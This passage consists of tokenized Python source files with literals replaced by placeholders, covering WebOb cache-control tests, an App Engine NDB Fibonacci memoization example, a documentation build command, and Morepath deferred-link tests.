<NUM_LIT:1> ] == '<STR_LIT>' <EOL> def test_setdefault ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> assert newone . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert len ( self . call_queue ) == <NUM_LIT:1> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == "<STR_LIT>" , self . call_queue [ - <NUM_LIT:1> ] <EOL> assert newone . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert len ( self . call_queue ) == <NUM_LIT:1> <EOL> def test_pop ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> newone . pop ( '<STR_LIT>' ) <EOL> assert len ( self . call_queue ) == <NUM_LIT:2> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == '<STR_LIT>' , self . call_queue [ - <NUM_LIT:1> ] <EOL> def test_popitem ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert newone . popitem ( ) == ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> assert len ( self . call_queue ) == <NUM_LIT:2> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == '<STR_LIT>' , self . call_queue [ - <NUM_LIT:1> ] <EOL> def test_callback_args ( self ) : <EOL> assert True <EOL> class TestExistProp ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> pass <EOL> def make_one ( self ) : <EOL> from webob . cachecontrol import exists_property <EOL> class Dummy ( object ) : <EOL> properties = dict ( prop = <NUM_LIT:1> ) <EOL> type = '<STR_LIT>' <EOL> prop = exists_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> badprop = exists_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return Dummy <EOL> def test_get_on_class ( self ) : <EOL> from webob . cachecontrol import exists_property <EOL> Dummy = self . make_one ( ) <EOL> assert isinstance ( Dummy . prop , exists_property ) , Dummy . prop <EOL> def test_get_on_instance ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> assert obj . prop is True <EOL> @ raises ( AttributeError ) <EOL> def test_type_mismatch_raise ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> obj . badprop = True <EOL> def test_set_w_value ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> obj . prop = True <EOL> assert obj . prop is True <EOL> assert obj . properties [ '<STR_LIT>' ] is None <EOL> def test_del_value ( self ) : <EOL> obj = self . make_one ( ) ( ) <EOL> del obj . prop <EOL> assert not '<STR_LIT>' in obj . properties <EOL> class TestValueProp ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> pass <EOL> def make_one ( self ) : <EOL> from webob . cachecontrol import value_property <EOL> class Dummy ( object ) : <EOL> properties = dict ( prop = <NUM_LIT:1> ) <EOL> type = '<STR_LIT>' <EOL> prop = value_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> badprop = value_property ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return Dummy <EOL> def test_get_on_class ( self ) : <EOL> from webob . cachecontrol import value_property <EOL> Dummy = self . make_one ( ) <EOL> assert isinstance ( Dummy . prop , value_property ) , Dummy . prop <EOL> def test_get_on_instance ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> assert dummy . prop , dummy . prop <EOL> def test_set_on_instance ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = "<STR_LIT>" <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> assert dummy . properties [ '<STR_LIT>' ] == "<STR_LIT>" , dict ( dummy . properties ) <EOL> def test_set_on_instance_bad_attribute ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = "<STR_LIT>" <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> assert dummy . properties [ '<STR_LIT>' ] == "<STR_LIT>" , dict ( dummy . properties ) <EOL> def test_set_wrong_type ( self ) : <EOL> from webob . cachecontrol import value_property <EOL> class Dummy ( object ) : <EOL> properties = dict ( prop = <NUM_LIT:1> , type = '<STR_LIT>' ) <EOL> type = '<STR_LIT>' <EOL> prop = value_property ( '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT>' ) <EOL> dummy = Dummy ( ) <EOL> def assign ( ) : <EOL> dummy . prop = '<STR_LIT:foo>' <EOL> self . assertRaises ( AttributeError , assign ) <EOL> def test_set_type_true ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = True <EOL> self . assertEquals ( dummy . prop , None ) <EOL> def test_set_on_instance_w_default ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = "<STR_LIT>" <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> def test_del ( self ) : <EOL> dummy = self . make_one ( ) ( ) <EOL> dummy . prop = '<STR_LIT>' <EOL> del dummy . prop <EOL> assert dummy . prop == "<STR_LIT>" , dummy . prop <EOL> def test_copy_cc ( ) : <EOL> from webob . cachecontrol import CacheControl <EOL> cc = CacheControl ( { '<STR_LIT>' : '<STR_LIT:%>' , "<STR_LIT>" : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> cc2 = cc . copy ( ) <EOL> assert cc . properties is not cc2 . properties <EOL> assert cc . type is cc2 . type <EOL> def test_serialize_cache_control_emptydict ( ) : <EOL> from webob . cachecontrol import serialize_cache_control <EOL> result = serialize_cache_control ( dict ( ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_cache_control_object ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_object_with_headers ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { '<STR_LIT>' : '<STR_LIT:a>' } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_value_is_None ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { '<STR_LIT>' : None } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> def test_serialize_cache_control_value_needs_quote ( ) : <EOL> from webob . cachecontrol import serialize_cache_control , CacheControl <EOL> result = serialize_cache_control ( CacheControl ( { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) ) <EOL> assert result == '<STR_LIT>' <EOL> class TestCacheControl ( unittest . TestCase ) : <EOL> def make_one ( self , props , typ ) : <EOL> from webob . cachecontrol import CacheControl <EOL> return CacheControl ( props , typ ) <EOL> def test_ctor ( self ) : <EOL> cc = self . make_one ( { '<STR_LIT:a>' : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> self . assertEquals ( cc . properties , { '<STR_LIT:a>' : <NUM_LIT:1> } ) <EOL> self . assertEquals ( cc . type , '<STR_LIT>' ) <EOL> def test_parse ( self ) : <EOL> from webob . cachecontrol import CacheControl <EOL> cc = CacheControl . parse ( "<STR_LIT>" ) <EOL> self . assertEquals ( type ( cc ) , CacheControl ) <EOL> self . assertEquals ( cc . max_age , <NUM_LIT> ) <EOL> self . assertEquals ( cc . public , True ) <EOL> def test_parse_updates_to ( self ) : <EOL> from webob . cachecontrol import CacheControl <EOL> def foo ( arg ) : return { '<STR_LIT:a>' : <NUM_LIT:1> } <EOL> cc = CacheControl . parse ( "<STR_LIT>" , updates_to = foo ) <EOL> self . assertEquals ( type ( cc ) , CacheControl ) <EOL> self . assertEquals ( cc . max_age , <NUM_LIT> ) <EOL> def test_parse_valueerror_int ( self ) : <EOL> from webob . cachecontrol import CacheControl <EOL> def foo ( arg ) : return { '<STR_LIT:a>' : <NUM_LIT:1> } <EOL> cc = CacheControl . parse ( "<STR_LIT>" ) <EOL> self . assertEquals ( type ( cc ) , CacheControl ) <EOL> self . assertEquals ( cc . max_age , '<STR_LIT:abc>' ) <EOL> def test_repr ( self ) : <EOL> cc = self . make_one ( { '<STR_LIT:a>' : '<STR_LIT:1>' } , '<STR_LIT>' ) <EOL> result = repr ( cc ) <EOL> self . assertEqual ( result , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import sys <EOL> import threading <EOL> import time <EOL> from google . appengine . api import memcache <EOL> from google . appengine . ext import webapp <EOL> from ndb import context , model , tasklets <EOL> @ tasklets . tasklet <EOL> def fibonacci ( n ) : <EOL> """<STR_LIT>""" <EOL> if n <= <NUM_LIT:1> : <EOL> raise tasklets . Return ( n ) <EOL> a , b = yield fibonacci ( n - <NUM_LIT:1> ) , fibonacci ( n - <NUM_LIT:2> ) <EOL> raise tasklets . Return ( a + b ) <EOL> class FibonacciMemo ( model . Model ) : <EOL> arg = model . IntegerProperty ( ) <EOL> value = model . IntegerProperty ( ) <EOL> @ tasklets . tasklet <EOL> def memoizing_fibonacci ( n ) : <EOL> """<STR_LIT>""" <EOL> if n <= <NUM_LIT:1> : <EOL> raise tasklets . Return ( n ) <EOL> key = model . Key ( FibonacciMemo , str ( n ) ) <EOL> memo = yield key . get_async ( ndb_should_cache = False ) <EOL> if memo is not None : <EOL> assert memo . arg == n <EOL> logging . info ( '<STR_LIT>' , n , memo . value ) <EOL> raise tasklets . Return ( memo . value ) <EOL> logging . info ( '<STR_LIT>' , n ) <EOL> a = yield memoizing_fibonacci ( n - <NUM_LIT:1> ) <EOL> b = yield memoizing_fibonacci ( n - <NUM_LIT:2> ) <EOL> ans = a + b <EOL> memo = FibonacciMemo ( key = key , arg = n , value = ans ) <EOL> logging . info ( '<STR_LIT>' , n , memo . value ) <EOL> yield memo . put_async ( ndb_should_cache = False ) <EOL> raise tasklets . Return ( ans ) <EOL> TRUE_VALUES = frozenset ( [ '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:t>' , '<STR_LIT:true>' , '<STR_LIT:y>' , '<STR_LIT:yes>' ] ) <EOL> class FiboHandler ( webapp . RequestHandler ) : <EOL> @ context . toplevel <EOL> def get ( self ) : <EOL> num = <NUM_LIT:10> <EOL> try : <EOL> num = int ( self . request . get ( '<STR_LIT>' ) ) <EOL> except Exception : <EOL> pass <EOL> if self . request . get ( '<STR_LIT>' ) in TRUE_VALUES : <EOL> logging . info ( '<STR_LIT>' ) <EOL> yield model . delete_multi_async ( x . key for x in FibonacciMemo . query ( ) ) <EOL> t0 = time . time ( ) <EOL> if self . request . get ( '<STR_LIT>' ) in TRUE_VALUES : <EOL> memo_type = '<STR_LIT>' <EOL> ans = yield memoizing_fibonacci ( num ) <EOL> else : <EOL> memo_type = '<STR_LIT>' <EOL> ans = yield fibonacci ( num ) <EOL> t1 = time . time ( ) <EOL> self . response . out . write ( '<STR_LIT>' % <EOL> ( memo_type , num , ans , t1 - t0 ) ) <EOL> urls = [ <EOL> ( '<STR_LIT>' , FiboHandler ) , <EOL> ] <EOL> app = webapp . WSGIApplication ( urls ) </s>
<s> from distutils . cmd import Command <EOL> import doctest <EOL> from glob import glob <EOL> import os <EOL> import sys <EOL> TOOLS_DIR = os . path . dirname ( __file__ ) <EOL> class build_doc ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ <EOL> ( '<STR_LIT>' , None , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , None , <EOL> "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def initialize_options ( self ) : <EOL> self . force = False <EOL> self . without_apidocs = False <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> from docutils . core import publish_cmdline <EOL> from docutils . nodes import raw <EOL> from docutils . parsers import rst <EOL> from genshi . input import HTMLParser <EOL> from genshi . template import TemplateLoader <EOL> docutils_conf = os . path . join ( TOOLS_DIR , '<STR_LIT>' , '<STR_LIT>' ) <EOL> epydoc_conf = os . path . join ( TOOLS_DIR , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> from pygments import highlight <EOL> from pygments . lexers import get_lexer_by_name <EOL> from pygments . formatters import HtmlFormatter <EOL> def code_block ( name , arguments , options , content , lineno , <EOL> content_offset , block_text , state , state_machine ) : <EOL> lexer = get_lexer_by_name ( arguments [ <NUM_LIT:0> ] ) <EOL> html = highlight ( '<STR_LIT:\n>' . join ( content ) , lexer , HtmlFormatter ( ) ) <EOL> return [ raw ( '<STR_LIT>' , html , format = '<STR_LIT:html>' ) ] <EOL> code_block . arguments = ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> code_block . options = { '<STR_LIT>' : rst . directives . unchanged } <EOL> code_block . content = <NUM_LIT:1> <EOL> rst . directives . register_directive ( '<STR_LIT>' , code_block ) <EOL> except ImportError : <EOL> print ( '<STR_LIT>' ) <EOL> loader = TemplateLoader ( [ '<STR_LIT>' , '<STR_LIT>' ] , variable_lookup = '<STR_LIT:strict>' ) <EOL> for source in glob ( '<STR_LIT>' ) : <EOL> dest = os . path . splitext ( source ) [ <NUM_LIT:0> ] + '<STR_LIT>' <EOL> if self . force or not os . path . exists ( dest ) or os . path . getmtime ( dest ) < os . path . getmtime ( source ) : <EOL> print ( '<STR_LIT>' % dest ) <EOL> publish_cmdline ( writer_name = '<STR_LIT:html>' , <EOL> argv = [ '<STR_LIT>' % docutils_conf , source , <EOL> dest ] ) <EOL> fileobj = open ( dest ) <EOL> try : <EOL> html = HTMLParser ( fileobj , encoding = '<STR_LIT:utf-8>' ) <EOL> template = loader . load ( '<STR_LIT>' ) <EOL> output = template . generate ( <EOL> html = html , <EOL> project = self . distribution <EOL> ) . render ( '<STR_LIT:html>' , encoding = '<STR_LIT:utf-8>' ) <EOL> finally : <EOL> fileobj . close ( ) <EOL> fileobj = open ( dest , '<STR_LIT:w>' ) <EOL> try : <EOL> fileobj . write ( output ) <EOL> finally : <EOL> fileobj . close ( ) <EOL> if not self . without_apidocs : <EOL> try : <EOL> from epydoc import cli <EOL> old_argv = sys . argv [ <NUM_LIT:1> : ] <EOL> sys . argv [ <NUM_LIT:1> : ] = [ <EOL> '<STR_LIT>' % epydoc_conf , <EOL> '<STR_LIT>' % self . distribution . packages [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] + self . distribution . packages <EOL> cli . cli ( ) <EOL> sys . argv [ <NUM_LIT:1> : ] = old_argv <EOL> except ImportError : <EOL> print ( '<STR_LIT>' ) <EOL> class test_doc ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> for filename in glob ( '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % filename ) <EOL> doctest . testfile ( filename , False , optionflags = doctest . ELLIPSIS ) </s>
<s> import webapp2 <EOL> class LazyHandler ( webapp2 . RequestHandler ) : <EOL> def get ( self , ** kwargs ) : <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> class CustomMethodHandler ( webapp2 . RequestHandler ) : <EOL> def custom_method ( self ) : <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> def handle_exception ( request , response , exception ) : <EOL> return webapp2 . Response ( body = '<STR_LIT>' ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> namespace_packages = [ '<STR_LIT>' ] , <EOL> packages = find_packages ( ) , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> import morepath <EOL> class app ( morepath . App ) : <EOL> pass <EOL> @ app . path ( path = '<STR_LIT:/>' ) <EOL> class Root ( object ) : <EOL> pass <EOL> @ app . path ( path = '<STR_LIT:/>' , model = Root ) <EOL> def get_root ( ) : <EOL> return Root ( ) </s>
<s> import morepath <EOL> from webtest import TestApp as Client <EOL> from morepath . error import LinkError , ConflictError <EOL> import pytest <EOL> def setup_module ( module ) : <EOL> morepath . disable_implicit ( ) <EOL> def test_defer_links ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( ) ) <EOL> @ Root . view ( model = RootModel , name = '<STR_LIT>' ) <EOL> def root_model_class_link ( self , request ) : <EOL> return request . class_link ( SubModel ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> with pytest . raises ( LinkError ) : <EOL> c . get ( '<STR_LIT>' ) <EOL> def test_defer_view ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . view ( SubModel ( ) ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Sub . json ( model = SubModel ) <EOL> def submodel_default ( self , request ) : <EOL> return { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> def test_defer_view_predicates ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . view ( SubModel ( ) , name = '<STR_LIT>' ) <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Sub . json ( model = SubModel , name = '<STR_LIT>' ) <EOL> def submodel_edit ( self , request ) : <EOL> return { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> def test_defer_view_missing_view ( ) : <EOL> class Root ( morepath . App ) : <EOL> pass <EOL> class Sub ( morepath . App ) : <EOL> pass <EOL> @ Root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ Root . json ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return { '<STR_LIT>' : request . view ( SubModel ( ) , name = '<STR_LIT>' ) } <EOL> @ Sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ Sub . json ( model = SubModel , name = '<STR_LIT>' ) <EOL> def submodel_edit ( self , request ) : <EOL> return { '<STR_LIT:hello>' : '<STR_LIT>' } <EOL> @ Root . mount ( app = Sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return Sub ( ) <EOL> @ Root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( Sub ( ) ) <EOL> c = Client ( Root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . json == { '<STR_LIT>' : None } <EOL> def test_defer_links_mount_parameters ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( SubModel ( '<STR_LIT:foo>' ) ) <EOL> class SubModel ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> @ sub . path ( path = '<STR_LIT>' , model = SubModel ) <EOL> def get_sub_model ( request ) : <EOL> return SubModel ( request . app . name ) <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' , <EOL> variables = lambda a : { '<STR_LIT>' : a . name } ) <EOL> def mount_sub ( mount_name ) : <EOL> return sub ( name = mount_name ) <EOL> @ root . defer_links ( model = SubModel ) <EOL> def defer_links_sub_model ( app , obj ) : <EOL> return app . child ( sub ( name = obj . name ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_link_acquisition ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . view ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . link ( Model ( '<STR_LIT:foo>' ) ) <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( obj , app ) : <EOL> return app . child ( sub ( ) ) <EOL> @ sub . defer_links ( model = Model ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_view_acquisition ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . json ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return { "<STR_LIT>" : "<STR_LIT>" } <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . json ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . view ( Model ( '<STR_LIT:foo>' ) ) <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( obj , app ) : <EOL> return app . child ( sub ( ) ) <EOL> @ sub . defer_links ( model = Model ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json == { "<STR_LIT>" : "<STR_LIT>" } <EOL> def test_defer_link_acquisition_blocking ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . view ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> try : <EOL> return request . link ( Model ( '<STR_LIT:foo>' ) ) <EOL> except LinkError : <EOL> return "<STR_LIT>" <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return sub ( ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_defer_view_acquisition_blocking ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> @ root . json ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return { "<STR_LIT>" : "<STR_LIT>" } <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( object ) : <EOL> pass <EOL> @ sub . json ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . view ( Model ( '<STR_LIT:foo>' ) ) is None <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return sub ( ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . json is True <EOL> def test_defer_link_should_not_cause_web_views_to_exist ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> pass <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ root . view ( model = Model , name = '<STR_LIT>' ) <EOL> def model_extra ( self , request ) : <EOL> return "<STR_LIT>" <EOL> @ sub . path ( path = '<STR_LIT>' ) <EOL> class SubModel ( Model ) : <EOL> pass <EOL> @ sub . view ( model = SubModel ) <EOL> def sub_model_default ( self , request ) : <EOL> return request . link ( Model ( ) ) <EOL> @ root . mount ( app = sub , path = '<STR_LIT>' ) <EOL> def mount_sub ( ) : <EOL> return sub ( ) <EOL> @ sub . defer_links ( model = Model ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> c . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> def test_defer_link_to_parent_from_root ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class sub ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class Model ( object ) : <EOL> pass <EOL> class OtherModel ( object ) : <EOL> pass <EOL> @ root . view ( model = Model ) <EOL> def model_default ( self , request ) : <EOL> return request . link ( OtherModel ( ) ) <EOL> @ root . defer_links ( model = OtherModel ) <EOL> def get_parent ( app , obj ) : <EOL> return app . parent <EOL> c = Client ( root ( ) ) <EOL> with pytest . raises ( LinkError ) : <EOL> c . get ( '<STR_LIT:/>' ) <EOL> def test_special_link_overrides_deferred_link ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> class SpecialAlphaModel ( AlphaModel ) : <EOL> pass <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : <EOL> return alpha ( ) <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . path ( model = SpecialAlphaModel , path = '<STR_LIT>' ) <EOL> def get_root_alpha ( ) : <EOL> return SpecialAlphaModel ( ) <EOL> @ root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( AlphaModel ( ) ) <EOL> @ root . view ( model = RootModel , name = '<STR_LIT>' ) <EOL> def root_model_special ( self , request ) : <EOL> return request . link ( SpecialAlphaModel ( ) ) <EOL> @ alpha . path ( path = '<STR_LIT>' , model = AlphaModel ) <EOL> def get_alpha ( ) : <EOL> return AlphaModel ( ) <EOL> @ root . defer_links ( model = AlphaModel ) <EOL> def defer_links_alpha ( app , obj ) : <EOL> return app . child ( alpha ( ) ) <EOL> c = Client ( root ( ) ) <EOL> response = c . get ( '<STR_LIT:/>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . body == b'<STR_LIT>' <EOL> def test_deferred_deferred_link ( ) : <EOL> class root ( morepath . App ) : <EOL> pass <EOL> class alpha ( morepath . App ) : <EOL> pass <EOL> class beta ( morepath . App ) : <EOL> pass <EOL> @ root . path ( path = '<STR_LIT>' ) <EOL> class RootModel ( object ) : <EOL> pass <EOL> @ root . view ( model = RootModel ) <EOL> def root_model_default ( self , request ) : <EOL> return request . link ( AlphaModel ( ) ) <EOL> @ alpha . path ( path = '<STR_LIT>' ) <EOL> class AlphaModel ( object ) : <EOL> pass <EOL> @ beta . path ( path = '<STR_LIT>' ) <EOL> class BetaModel ( object ) : <EOL> pass <EOL> @ beta . view ( model = BetaModel ) <EOL> def beta_model_default ( self , request ) : <EOL> return request . link ( AlphaModel ( ) ) <EOL> @ root . mount ( app = alpha , path = '<STR_LIT>' ) <EOL> def mount_alpha ( ) : 